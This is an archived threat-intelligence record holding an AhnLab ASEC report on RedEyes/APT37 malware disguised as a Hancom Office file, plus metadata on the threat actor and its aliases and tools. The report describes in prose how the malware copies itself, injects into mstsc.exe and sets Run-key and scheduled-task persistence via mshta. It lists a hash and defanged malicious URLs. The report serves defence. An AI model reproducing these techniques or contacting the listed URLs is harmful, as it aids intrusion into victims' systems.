{ "id": "ba54936c-34b6-4367-82e6-20702f415496", "created_at": "2026-04-06T00:08:46.564881Z", "updated_at": "2026-04-10T03:38:06.383576Z", "deleted_at": null, "sha1_hash": "c77095adcdba92974000090726df05c7247d10e4", "title": "Tracking Traces of Malware Disguised as Hancom Office Document File and Being Distributed (RedEyes) - ASEC", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2386231, "plain_text": "Tracking Traces of Malware Disguised as Hancom Office\r\nDocument File and Being Distributed (RedEyes) - ASEC\r\nBy ATCP\r\nPublished: 2023-05-24 · Archived: 2026-04-05 17:58:30 UTC\r\nAhnLab Security Emergency response Center (ASEC) has confirmed the distribution of malware disguised as\r\nHancom Office document files. The malware that is being distributed is named “Who and What Threatens the\r\nWorld (Column).exe” and is designed to deceive users by using an icon that is similar to that of Hancom Office.\r\nDecompressing the compressed file reveals a relatively large file with a size of 36,466,238 bytes. AhnLab\r\nEndpoint Detection and Response (EDR) is capable of detecting such attack techniques through its trace data, and\r\nit allows users to check the data required to investigate the related breach case.\r\nhttps://asec.ahnlab.com/en/53377/\r\nPage 1 of 6\n\nFigure 1 depicts the icon of the malware and its overall execution. It provides a visual representation of which\r\nprocesses are used when the malware is executed.\r\nhttps://asec.ahnlab.com/en/53377/\r\nPage 2 of 6\n\nFigures 2 and 3 show the trace data of key behaviors within the overall flow of the malware. In Figure 2, a trace\r\ncan be observed of the malware creating a folder named onedrivenew in the AppData directory and self-copying\r\nitself with the filename onedrivenew.exe to appear as a normal file. In Figure 3, a trace can be seen of the malware\r\ncreating and executing a normal Hancom Office file with the same filename as the malware within the same\r\ndirectory where the malware was executed. The malware is injected and executed within the normal Windows\r\nprocess called mstsc.exe. The original file is deleted using the cmd command.\r\nhttps://asec.ahnlab.com/en/53377/\r\nPage 3 of 6\n\nFigure 4 displays the trace data of mstsc.exe being executed after being injected with malware. The malware\r\nregisters its file with the name onedrivenew under the Run key in order to make it run after the system is rebooted.\r\nAfterward, it uses the schtasks.exe command to register the file to the task scheduler with the name OneDriveOp\r\nto connect to a certain URL every 60 minutes using the normal Windows file mshta.exe. The URL registered in\r\nthe task scheduler appears to be a normal homepage, but it contains a web shell. The inserted web shell has been\r\nconfirmed to be similar to the one posted in “Targeted Attack on a Website Developed by a Specific Web Design\r\nCompany (Red Eyes and APT37)” on the AhnLab Threat Intelligence Platform.\r\nWhen it comes to targeted attacks, there are factors that general users may struggle to deal with. Even if users find\r\nthemselves exposed to such threats, AhnLab EDR can provide trace data for appropriate responses.\r\n[File Detection]\r\n– Trojan/Win.Agent.R580958 (2023.05.24.02)\r\nMD5\r\n93fc0fb9b87a00b38f18c1cc4ee02e50\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//ingarchi[.]com/bbs/data/culture\r\nhttp[:]//ingarchi[.]com/bbs/data/culture/getcfg[.]php\r\nhttps://asec.ahnlab.com/en/53377/\r\nPage 4 of 6\n\nAdditional IOCs are available on AhnLab TIP.\r\nTo learn more about AhnLab EDR's advanced behavior-based detection and reponse, please click the banner\r\nbelow\r\nhttps://asec.ahnlab.com/en/53377/\r\nPage 5 of 6\n\nSource: https://asec.ahnlab.com/en/53377/\r\nhttps://asec.ahnlab.com/en/53377/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://asec.ahnlab.com/en/53377/" ], "report_names": [ "53377" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434126, "ts_updated_at": 1775792286, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c77095adcdba92974000090726df05c7247d10e4.pdf", "text": "https://archive.orkl.eu/c77095adcdba92974000090726df05c7247d10e4.txt", "img": "https://archive.orkl.eu/c77095adcdba92974000090726df05c7247d10e4.jpg" } }